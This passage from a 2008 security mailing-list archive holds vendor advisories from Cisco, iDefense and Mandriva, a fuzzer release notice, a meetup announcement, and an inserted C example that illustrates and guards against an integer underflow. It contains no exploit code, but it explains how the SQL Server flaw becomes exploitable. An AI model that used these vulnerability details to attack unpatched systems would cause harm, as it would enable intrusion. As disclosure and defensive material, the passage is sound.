  * full-disclosure at lists.grok.org.uk
  * comp.dcom.sys.cisco at newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+-----------------------------------------------------------+
| Revision 1.0 | 2008-July-08 | Initial public release      |
+-----------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
Copyright 2007-2008 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: Jul 08, 2008 Document ID: 107064
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkhztUIACgkQ86n/Gc8U/uCAgACfVRRoJO4w4defnpwbNlfgBm4t
2SMAnjKCKECHtsjN9umqqPrPd2DW4IcC
=XGZw
-----END PGP SIGNATURE-----

From synackurg at gmail.com Tue Jul 8 20:28:30 2008
From: synackurg at gmail.com (David Bryan)
Date: Tue, 8 Jul 2008 14:28:30 -0500
Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008@6pm
Message-ID:

Only one month to DEFCON. Just passing on to the security community of Minneapolis, please feel free to join us.

Topic: How malware can still subvert Anti-Virus and computer security controls.
Speaker: Chris Secrest
Time: 6PM-10PM
Talk will start at 7PM

This is part of our regular monthly meetings. For info and directions, see http://www.dc612.org/

VideoMan

For more info on DC612 see:
Blog: http://www.dc612.org/
Email: info at dc612.org
GoogleGroup: http://groups.google.com/group/dc612

From victor.stinner at haypocalc.com Tue Jul 8 21:31:09 2008
From: victor.stinner at haypocalc.com (Victor Stinner)
Date: Tue, 8 Jul 2008 22:31:09 +0200
Subject: [Full-disclosure] Fusil the fuzzer version 0.9 released
Message-ID: <200807082231.09305.victor.stinner@haypocalc.com>

Fusil is not a fuzzer but a toolbox to build your own fuzzer. Tools target command line programs running on Linux, but it also works on UNIX-like and BSD systems. There are also some tools to interact with an X11 (graphical) application. It's easy to add your own tools to extend Fusil.

Website: http://fusil.hachoir.org/

Fusil is written in Python, based on a multi-agents system and distributed under the GNU GPL license.

Tools
=====

Actions:

 * Create a command line, environment variables and a process: create temporary working directory, limit memory and kill the process after the timeout
 * Mangle a file: invert some bits, replace bytes, inject byte strings (eg. \xFF\xFF), increment a byte, insert or remove bytes, ... AutoMangle guesses the best parameters to crash the program but restarts with random operations at each session, whereas IncrMangle injects more and more errors (keep operations)
 * NetworkClient, NetworkServer, (...): tools for network communication
 * HttpServer: a simple HTTP server

Probes:

 * Watch a process stdout or any log file (eg. /var/log/syslog): search common patterns like "segfault" or "assert", count number of lines, ...
 * Watch process death: exit with an exitcode, killed by a signal, or killed because of the timeout?
 * Watch CPU usage of a process
 * Get process execution time
 * AttachProcess: watch a running process (eg. ClamAV daemon)

Scenario
========

Fusil is not hardcoded; you describe your own scenario. Something like:

 * mangle a file
 * create a process
 * watch a process
 * watch process stdout

You can start multiple processes, watch multiple processes, chain actions as you want. Another scenario example:

 * start a web server
 * generate N mangled images (or any HTML embedded file: video, flash, ...)
 * start Firefox with the right URL
 * watch Firefox process
 * send F5 key to switch to the new session

Common features
===============

Fusil has features common to all fuzzers:

 * create a directory to store all generated files (by the fuzzer but also maybe by the target process)
 * keep the directory on success, otherwise remove all generated files and directories
 * log all actions into a main log file but all session actions in a dedicated log file (eg. run-0001/project.log and run-0001/session-0001/session.log)
 * loop until we get N crashes (default: N=5): sleep between two sessions until system load is above a limit (default: 50%) to avoid false positives (eg. timeout of the target because of a cronjob)
 * limit process memory to get malloc(-1) error without using all memory

Projects
========

Existing Fusil "projects":

 * Real world project:
   - PHP / Python: generate random function call (and also method for Python)
   - ClamAV: already found cool bugs (eat all CPU and memory of the daemon)
   - gstreamer / mplayer: have fun ;-)
   - identify: ImageMagick identify or convert commands
   - firefox: test Firefox image parser, flash plugin, etc.
   - poppler: PDF library of Kpdf and Gnome
   - libexif: JPEG EXIF
 * Old projects (simple examples)
   - gettext: demo to prove that gettext is unsafe
   - libc_printf: printf() of your C library (yes, it crashes)
   - xterm: doesn't like long PATH environment variable
   - vim: old version of vim crashes with

Other projects are available but don't work: linux_syscall, libc_env, mysql, linux_proc, linux_ioctl, rpm, ...

Incomplete list of crashed programs, CVE, and bug reports: http://fusil.hachoir.org/trac/wiki/CrashList

I just tested CPython: I quickly found 14 bugs ;-)

--
Victor Stinner aka haypo

From infolookup at gmail.com Tue Jul 8 21:38:10 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Tue, 8 Jul 2008 20:38:10 +0000
Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008@6pm
Message-ID: <289762736-1215549486-cardhu_decombobulator_blackberry.rim.net-622753870-@bxe028.bisx.prod.on.blackberry>

Any meetings of this nature in New York :)

------Original Message------
From: David Bryan
Sender:
To: full-disclosure at lists.grok.org.uk
To: bugtraq at securityfocus.com
Sent: Jul 8, 2008 3:28 PM
Subject: [Full-disclosure] Minneapolis DC612 Meeting July 10th, 2008 at 6pm

Only one month to DEFCON. Just passing on to the security community of Minneapolis, please feel free to join us.

Topic: How malware can still subvert Anti-Virus and computer security controls.
Speaker: Chris Secrest
Time: 6PM-10PM
Talk will start at 7PM

This is part of our regular monthly meetings. For info and directions, see http://www.dc612.org/

VideoMan

For more info on DC612 see:
Blog: http://www.dc612.org/
Email: info at dc612.org
GoogleGroup: http://groups.google.com/group/dc612

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Sent from my Verizon Wireless BlackBerry

From labs-no-reply at idefense.com Tue Jul 8 22:18:29 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 08 Jul 2008 17:18:29 -0400
Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability
Message-ID: <4873D9A5.5070508@idefense.com>

iDefense Security Advisory 07.08.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 08, 2008

I. BACKGROUND

SQL Server is Microsoft's database server product. It supports the restoration and inspection of backups via SQL statements. For more information see the vendor's website found at the following URL.

http://www.microsoft.com/sql/default.mspx

II. DESCRIPTION

Remote exploitation of an integer underflow vulnerability within Microsoft Corp.'s SQL Server could allow a remote attacker to execute arbitrary code with the privileges of the SQL Server.

The vulnerability exists within the code responsible for parsing a stored backup file. A 32-bit integer value, representing the size of a record, is taken from the file and used to calculate the number of bytes to read into a heap buffer. This calculation can underflow, which leads to insufficient memory being allocated. The buffer is subsequently overfilled leading to an exploitable condition.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the SQL Server. SQL Server 2005 runs under the "NETWORK SERVICE" account, which is similar to an unprivileged user account.

The target function can be run by any user with access to query the database. This attack could also be conducted anonymously through a Web application if it contained an SQL Injection vulnerability.

For the server to load the corrupted backup file, an attacker would have to supply a path to a remote file using either SMB or WebDAV.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in Microsoft SQL Server 2005 Service Pack 2 Hot Fix 4.
Additional tests against SQL Server 2005 without any updates suggest it is also vulnerable. Previous versions are also suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any direct workaround for this issue. Administrators can disable SMB and WebDAV support on affected SQL Servers to prevent access to remote files.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security Bulletin MS08-040. For more information, consult their bulletin at the following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0107 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

12/06/2007 Initial vendor notification
12/06/2007 Initial vendor response
07/08/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Brett Moore, from Insomnia Security, brett.moore at insomniasec.com www.insomniasec.com

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From security at mandriva.com Tue Jul 8 22:30:00 2008
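The size arithmetic described in section II of the iDefense advisory above, worked through as an added example; it is not code from iDefense, Microsoft or any message in this archive. The record layout, the constants and every function name are assumptions made for illustration: `unchecked_sizes` only computes the wrapped values, and `parse_record` shows the bounds checks that reject such a record before anything is allocated.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record layout (an assumption for this example, not the real
 * SQL Server backup format): an 8-byte header whose first 4 bytes hold the
 * little-endian total record size, followed by the payload. */
#define HDR_LEN      8u
#define TRAILER_LEN  4u           /* hypothetical bytes the parser reserves */
#define MAX_PAYLOAD  (1u << 20)   /* policy cap chosen for the example */

enum parse_status { PARSE_OK = 0, ERR_TRUNCATED, ERR_BAD_SIZE, ERR_TOO_LARGE, ERR_NOMEM };

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

struct sizes { uint32_t copy_len; uint32_t alloc_len; };

/* The flawed 32-bit arithmetic on its own; nothing is allocated or copied. */
static struct sizes unchecked_sizes(uint32_t record_size)
{
    struct sizes s;
    s.copy_len  = record_size - HDR_LEN;     /* wraps when record_size < 8 */
    s.alloc_len = s.copy_len + TRAILER_LEN;  /* wraps again to a tiny value */
    return s;
}

/* Hardened parser: every size is validated against the header length, the
 * bytes actually supplied and a policy cap before allocating or copying. */
static enum parse_status parse_record(const uint8_t *in, size_t in_len,
                                      uint8_t **payload, size_t *payload_len)
{
    uint32_t record_size;
    size_t len;
    uint8_t *buf;

    *payload = NULL;
    *payload_len = 0;
    if (in_len < HDR_LEN)
        return ERR_TRUNCATED;
    record_size = load_le32(in);
    if (record_size < HDR_LEN)           /* subtraction below would underflow */
        return ERR_BAD_SIZE;
    if (record_size > in_len)            /* claims more bytes than supplied */
        return ERR_TRUNCATED;
    len = (size_t)record_size - HDR_LEN;
    if (len > MAX_PAYLOAD)
        return ERR_TOO_LARGE;
    buf = malloc(len + TRAILER_LEN);     /* cannot wrap: len <= MAX_PAYLOAD */
    if (buf == NULL)
        return ERR_NOMEM;
    memcpy(buf, in + HDR_LEN, len);
    memset(buf + len, 0, TRAILER_LEN);
    *payload = buf;
    *payload_len = len;
    return PARSE_OK;
}

int main(void)
{
    /* Constructed sample records, not taken from any real backup file. */
    const uint8_t good[] = { 13, 0, 0, 0, 0, 0, 0, 0, 'h', 'e', 'l', 'l', 'o' };
    const uint8_t bad[]  = { 4, 0, 0, 0, 0, 0, 0, 0 };  /* size smaller than header */
    uint8_t *p;
    size_t n;
    struct sizes s = unchecked_sizes(load_le32(bad));

    printf("unchecked: copy_len=%u alloc_len=%u\n",
           (unsigned)s.copy_len, (unsigned)s.alloc_len);
    printf("checked, well-formed record: status %d\n",
           (int)parse_record(good, sizeof good, &p, &n));
    free(p);
    printf("checked, undersized record:  status %d\n",
           (int)parse_record(bad, sizeof bad, &p, &n));
    return 0;
}
```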
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 08 Jul 2008 15:30:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:136 ] - Updated Firefox packages fix vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:136
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-firefox
Date    : July 8, 2008
Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

Security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.15 (CVE-2008-2798, CVE-2008-2799, CVE-2008-2800, CVE-2008-2801, CVE-2008-2802, CVE-2008-2803, CVE-2008-2805, CVE-2008-2807, CVE-2008-2808, CVE-2008-2809, CVE-2008-2811).

This update provides the latest Firefox to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2798
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2799
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2800
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2801
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2802
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2803
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2805
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2807
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2808
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2809
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2811
http://www.mozilla.org/security/announce/2008/mfsa2008-21.html
http://www.mozilla.org/security/announce/2008/mfsa2008-22.html
http://www.mozilla.org/security/announce/2008/mfsa2008-23.html
http://www.mozilla.org/security/announce/2008/mfsa2008-24.html
http://www.mozilla.org/security/announce/2008/mfsa2008-25.html
http://www.mozilla.org/security/announce/2008/mfsa2008-27.html
http://www.mozilla.org/security/announce/2008/mfsa2008-29.html
http://www.mozilla.org/security/announce/2008/mfsa2008-30.html
http://www.mozilla.org/security/announce/2008/mfsa2008-31.html
http://www.mozilla.org/security/announce/2008/mfsa2008-33.html
_______________________________________________________________________

Updated Packages:
2008.0/x86_64/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.0.x86_64.rpm 6d5f3d6c81eee5c62f9e8c992102830a 2008.0/x86_64/totem-2.20.1-1.5mdv2008.0.x86_64.rpm 6ddcc6a17cc3523033bc160e9c488832 2008.0/x86_64/totem-common-2.20.1-1.5mdv2008.0.x86_64.rpm 805cbef8aef3e897a27ca09115a36de3 2008.0/x86_64/totem-gstreamer-2.20.1-1.5mdv2008.0.x86_64.rpm 7f18397fd9c1831757833f3ce55fd490 2008.0/x86_64/totem-mozilla-2.20.1-1.5mdv2008.0.x86_64.rpm ac94a1de03d30d1d242ebd6084366a13 2008.0/x86_64/totem-mozilla-gstreamer-2.20.1-1.5mdv2008.0.x86_64.rpm c7ac019fd5186e938933c37fc9aecce8 2008.0/x86_64/yelp-2.20.0-3.5mdv2008.0.x86_64.rpm 6b7e935872d843d8a66826d6f93b5c1a 2008.0/SRPMS/devhelp-0.16-1.6mdv2008.0.src.rpm 8db2fcf79f0a0e3820a2a98d10efdb5d 2008.0/SRPMS/eclipse-3.3.0-0.20.8.6mdv2008.0.src.rpm 9c95e6b81406a4b7d3fb8f5d9243c787 2008.0/SRPMS/epiphany-2.20.0-1.6mdv2008.0.src.rpm 7d2663659d636cabc92d0dd05e4712fb 2008.0/SRPMS/galeon-2.0.3-7.6mdv2008.0.src.rpm a40949f099e226e96869da54af4e3272 2008.0/SRPMS/gnome-python-extras-2.19.1-4.6mdv2008.0.src.rpm f9ba631cdbdb25b92d7bc3d0f568a5d0 2008.0/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.0.src.rpm e8436c7be53c27319d1d7674376c25ac 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.0.src.rpm 6f69cda328c5fba6f764a6d426c63a75 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.0.src.rpm 222784ba3b5d3441828a839d6ad686a8 2008.0/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.0.src.rpm feb23780b9cc4068e64f4482c848ddf2 2008.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.0.src.rpm da1c616b5147bade71c7a2c91d5ffaef 2008.0/SRPMS/totem-2.20.1-1.5mdv2008.0.src.rpm d362c818c8e312b0311b7ed6f1a88426 2008.0/SRPMS/yelp-2.20.0-3.5mdv2008.0.src.rpm Mandriva Linux 2008.1: 6e47023193c6c8e0f33e87075a77acd4 2008.1/i586/devhelp-0.19-3.2mdv2008.1.i586.rpm a835fafecd7e40c337cf24dd380d3590 2008.1/i586/devhelp-plugins-0.19-3.2mdv2008.1.i586.rpm 8fe22458762d4502d4827aee19ad0c18 2008.1/i586/epiphany-2.22.0-4.2mdv2008.1.i586.rpm cf52ca44e4b0a9f47695c78aa1e58e5e 
2008.1/i586/epiphany-devel-2.22.0-4.2mdv2008.1.i586.rpm 42234a0eb5f595240ab14ecd04e5616b 2008.1/i586/galeon-2.0.4-3.2mdv2008.1.i586.rpm 0b13dcc6aea5b22f3e49b122b6ac7b43 2008.1/i586/gnome-python-extras-2.19.1-10.2mdv2008.1.i586.rpm ff255ac31801091172d70821e692ba13 2008.1/i586/gnome-python-gda-2.19.1-10.2mdv2008.1.i586.rpm e10fae6944b13efc54f10193bd1b369b 2008.1/i586/gnome-python-gda-devel-2.19.1-10.2mdv2008.1.i586.rpm 03a02cd1a7e183bdce9377a0e6dbf539 2008.1/i586/gnome-python-gdl-2.19.1-10.2mdv2008.1.i586.rpm 2631d97342ffec4ec292a7a1342a502a 2008.1/i586/gnome-python-gksu-2.19.1-10.2mdv2008.1.i586.rpm 793a221a74a01a8e6a0d5736b914a8e8 2008.1/i586/gnome-python-gtkhtml2-2.19.1-10.2mdv2008.1.i586.rpm 930842265e8ab89cbe48bfdfdea0684d 2008.1/i586/gnome-python-gtkmozembed-2.19.1-10.2mdv2008.1.i586.rpm a1b50ae4d53ddaa3e385a6402cdeac4c 2008.1/i586/gnome-python-gtkspell-2.19.1-10.2mdv2008.1.i586.rpm 9c66e0fdef4add5c19e2c07ce639d1fa 2008.1/i586/libdevhelp-1_0-0.19-3.2mdv2008.1.i586.rpm 9880e943cd0490f161b4092e0ee008ab 2008.1/i586/libdevhelp-1-devel-0.19-3.2mdv2008.1.i586.rpm 43943721d66d7d0f8b015b19d856ea40 2008.1/i586/libgluezilla0-1.2.6.1-2.2mdv2008.1.i586.rpm 9bf2a54fb437f51b24c526ea9c7e0c93 2008.1/i586/libmozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.1.i586.rpm 9e9b2fae069594669b67594f5c628b98 2008.1/i586/libmozilla-firefox-devel-2.0.0.15-1.1mdv2008.1.i586.rpm f1bbd57d2b4f4126c45a811b8bec8167 2008.1/i586/mozilla-firefox-2.0.0.15-1.1mdv2008.1.i586.rpm 1b26557de936cdade4fbbe71bfbe2469 2008.1/i586/mozilla-firefox-af-2.0.0.15-1mdv2008.1.i586.rpm 71bee32a0d25a1132dd69e8cd9ef0c17 2008.1/i586/mozilla-firefox-ar-2.0.0.15-1mdv2008.1.i586.rpm 5517db43288cb5f8bb95949679fc392f 2008.1/i586/mozilla-firefox-be-2.0.0.15-1mdv2008.1.i586.rpm 587877a454f6d624144779f9d9c9e0fd 2008.1/i586/mozilla-firefox-bg-2.0.0.15-1mdv2008.1.i586.rpm 62bd35ab38cb0d1ebd88dcb69b30c3bf 2008.1/i586/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.1.i586.rpm 0eab4cc1f029d51715048d71a1477123 
2008.1/i586/mozilla-firefox-ca-2.0.0.15-1mdv2008.1.i586.rpm cae761e30b9b5263f80e0267011920ef 2008.1/i586/mozilla-firefox-cs-2.0.0.15-1mdv2008.1.i586.rpm 098c7ac00042f4a98e08d773e7bd6888 2008.1/i586/mozilla-firefox-da-2.0.0.15-1mdv2008.1.i586.rpm 72f703019ee02698d3e03a495f5fa63a 2008.1/i586/mozilla-firefox-de-2.0.0.15-1mdv2008.1.i586.rpm e88b733e476eb2a690cda71bdf6a4809 2008.1/i586/mozilla-firefox-el-2.0.0.15-1mdv2008.1.i586.rpm 167da23ed6afb5c4f085dabd6ff79225 2008.1/i586/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.1.i586.rpm b052a809947543f53f299a399f59e7be 2008.1/i586/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.1.i586.rpm 8544caea86837432ce9dcb51e9dce001 2008.1/i586/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.1.i586.rpm 0a9d2e3e82c873fdc7b7d52d11dff10e 2008.1/i586/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.1.i586.rpm 5c1bdcec6b0b769d62836270f4f73718 2008.1/i586/mozilla-firefox-eu-2.0.0.15-1mdv2008.1.i586.rpm be019017361a033c2a3c1d5ecb84b7c2 2008.1/i586/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.i586.rpm 4cb32f3bf0243edd025199a58c715400 2008.1/i586/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.i586.rpm 4bd9cf7fcb88d95b50a4244cadb807ed 2008.1/i586/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.i586.rpm 728819425ec211463565aabd5d781b0e 2008.1/i586/mozilla-firefox-fi-2.0.0.15-1mdv2008.1.i586.rpm 9857e4a736412c1bc08f661f28d2150b 2008.1/i586/mozilla-firefox-fr-2.0.0.15-1mdv2008.1.i586.rpm 96260e7f8bb855d816b75bb2f2302e2a 2008.1/i586/mozilla-firefox-fy-2.0.0.15-1mdv2008.1.i586.rpm ba6191c211ccb4594144640e65c09732 2008.1/i586/mozilla-firefox-ga-2.0.0.15-1mdv2008.1.i586.rpm ef76ab95e91b96783f4a3c58e0cb84dc 2008.1/i586/mozilla-firefox-gnome-support-2.0.0.15-1.1mdv2008.1.i586.rpm 7c26a187c7ddfdfde568b9e3bcf563e6 2008.1/i586/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.1.i586.rpm 820d16cc2052e418bfcec2dc141a4882 2008.1/i586/mozilla-firefox-he-2.0.0.15-1mdv2008.1.i586.rpm 14501eccfae31110c7295ac5648f0379 2008.1/i586/mozilla-firefox-hu-2.0.0.15-1mdv2008.1.i586.rpm 
2faf0e1e4d6b35eb08a37b33acec96f1 2008.1/i586/mozilla-firefox-it-2.0.0.15-1mdv2008.1.i586.rpm 4d6a5bcaa23a9a7904b69193f701e67e 2008.1/i586/mozilla-firefox-ja-2.0.0.15-1mdv2008.1.i586.rpm c7f6daf0b54321b4a1da17239234acfe 2008.1/i586/mozilla-firefox-ka-2.0.0.15-1mdv2008.1.i586.rpm 4366d21f3c74607be831e905cd926510 2008.1/i586/mozilla-firefox-ko-2.0.0.15-1mdv2008.1.i586.rpm 430ad47f2ff5d5f9c9ff4ac5d58b320b 2008.1/i586/mozilla-firefox-ku-2.0.0.15-1mdv2008.1.i586.rpm 7eb60eb9a275041ec570369c8945c56f 2008.1/i586/mozilla-firefox-lt-2.0.0.15-1mdv2008.1.i586.rpm 25b930f321bf02efbee8fe30cb2d228a 2008.1/i586/mozilla-firefox-mk-2.0.0.15-1mdv2008.1.i586.rpm e600759a5ccbcbde26dc45b04a5c7270 2008.1/i586/mozilla-firefox-mn-2.0.0.15-1mdv2008.1.i586.rpm bd0c7a80958f6bed0376973b508bc94c 2008.1/i586/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.1.i586.rpm 6fc13439a31de96233f0f10f20dca3d1 2008.1/i586/mozilla-firefox-nl-2.0.0.15-1mdv2008.1.i586.rpm ba535d4a664d01b25e33369aba4986d4 2008.1/i586/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.1.i586.rpm ef861c8868ab6ddf7c84fca25d1d127c 2008.1/i586/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.1.i586.rpm 1826fed86563150ce66fb50ae697983f 2008.1/i586/mozilla-firefox-pl-2.0.0.15-1mdv2008.1.i586.rpm 83cb757724527da02d4aa46a7e62308e 2008.1/i586/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.1.i586.rpm cc60bd8c4da66c1642cc2ea8bf28db0e 2008.1/i586/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.1.i586.rpm c345cdd0e3c439883d4799fd220ab12a 2008.1/i586/mozilla-firefox-ro-2.0.0.15-1mdv2008.1.i586.rpm ee9ffef046bb11c1e7938af13dfc552f 2008.1/i586/mozilla-firefox-ru-2.0.0.15-1mdv2008.1.i586.rpm 00ddac70e8fd957abbbbb92d21cf2ed0 2008.1/i586/mozilla-firefox-sk-2.0.0.15-1mdv2008.1.i586.rpm 1a9c0212089a0e2f072f12dff11c9841 2008.1/i586/mozilla-firefox-sl-2.0.0.15-1mdv2008.1.i586.rpm 2b82db9c787cc76028fd5be9e85c8e5a 2008.1/i586/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.1.i586.rpm d0d0b98dba385a5c02545731d0faf19c 2008.1/i586/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.i586.rpm 
e9cc8f155b04d9b395789966e284e880 2008.1/i586/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.i586.rpm eac092e52f4d0cbbab04b6e213c80d4d 2008.1/i586/mozilla-firefox-tr-2.0.0.15-1mdv2008.1.i586.rpm 17c0a573f824fb10820081f05edc09fb 2008.1/i586/mozilla-firefox-uk-2.0.0.15-1mdv2008.1.i586.rpm 6b78ce63805c643f6369dd3d624007cc 2008.1/i586/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.1.i586.rpm 8ae13015b9c8bd5004752f305135e0a2 2008.1/i586/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.1.i586.rpm fc9523830736bce5d7fcfdea3d14b14d 2008.1/i586/totem-2.22.0-4.2mdv2008.1.i586.rpm 45d978213b98d311c49a55bd10d72ea1 2008.1/i586/totem-common-2.22.0-4.2mdv2008.1.i586.rpm d99f127243e382ef97996a00b5237ab5 2008.1/i586/totem-gstreamer-2.22.0-4.2mdv2008.1.i586.rpm fe8d0816fd418f77e32c894182ce7f05 2008.1/i586/totem-mozilla-2.22.0-4.2mdv2008.1.i586.rpm 2fcc504457161d3dc322ee3b48d0c76c 2008.1/i586/totem-mozilla-gstreamer-2.22.0-4.2mdv2008.1.i586.rpm 126d66f0c89bb906d2f6a2bc10719bba 2008.1/i586/yelp-2.22.0-2.2mdv2008.1.i586.rpm 3196744e1e3594540284ad1ada3ca4fb 2008.1/SRPMS/devhelp-0.19-3.2mdv2008.1.src.rpm a5cc93c5bf1460255c9e9fd84cd173bc 2008.1/SRPMS/epiphany-2.22.0-4.2mdv2008.1.src.rpm e888ef9a8bef85515d9c74a6ad8c27f5 2008.1/SRPMS/galeon-2.0.4-3.2mdv2008.1.src.rpm 56e88cd192af2268db247ca2f5c90cd7 2008.1/SRPMS/gluezilla-1.2.6.1-2.2mdv2008.1.src.rpm 99cd4a98919eb78877c2753501c9b122 2008.1/SRPMS/gnome-python-extras-2.19.1-10.2mdv2008.1.src.rpm 415409af7ab11039e61582336090b347 2008.1/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.1.src.rpm a105bac35cd9a4a4832901dfaac96f72 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.src.rpm a4f2e889fa2c0812c39041feb935ccef 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.src.rpm 6c72fc55e1cf2d0c9212f96979182202 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.src.rpm ebb96058ed42569f2ea7a0d613b3e868 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.1.src.rpm 4f282392c5177706a3f64df3cdb362b7 
2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.src.rpm 9f2b2425c98681a1d4743401300fce76 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.src.rpm 9c996ac02a215975ecdc14cb86336cd5 2008.1/SRPMS/totem-2.22.0-4.2mdv2008.1.src.rpm a7285d39afcf1d396cbcf419f37ba4f6 2008.1/SRPMS/yelp-2.22.0-2.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f634e5629aee78e6cd8e08d22d1626fb 2008.1/x86_64/devhelp-0.19-3.2mdv2008.1.x86_64.rpm dc3eee6ee5db62d21222c23277a1bc1f 2008.1/x86_64/devhelp-plugins-0.19-3.2mdv2008.1.x86_64.rpm b6fcec0f4fd39dcb8ddedbe3879ad522 2008.1/x86_64/epiphany-2.22.0-4.2mdv2008.1.x86_64.rpm f56a1939ae65efe9ee65ed76517ce2e0 2008.1/x86_64/epiphany-devel-2.22.0-4.2mdv2008.1.x86_64.rpm ad79a3e554a0084335543e2e8c51e4cb 2008.1/x86_64/galeon-2.0.4-3.2mdv2008.1.x86_64.rpm bea28a1925d2742f24af8aeb3e35b3a4 2008.1/x86_64/gnome-python-extras-2.19.1-10.2mdv2008.1.x86_64.rpm 71870c1b3229e2f7c503a2d54ffb6352 2008.1/x86_64/gnome-python-gda-2.19.1-10.2mdv2008.1.x86_64.rpm 9c65805404ab4f465fa1e6cde89f24e2 2008.1/x86_64/gnome-python-gda-devel-2.19.1-10.2mdv2008.1.x86_64.rpm e34473eb2ff9b0cbd0b5af51d3c5b617 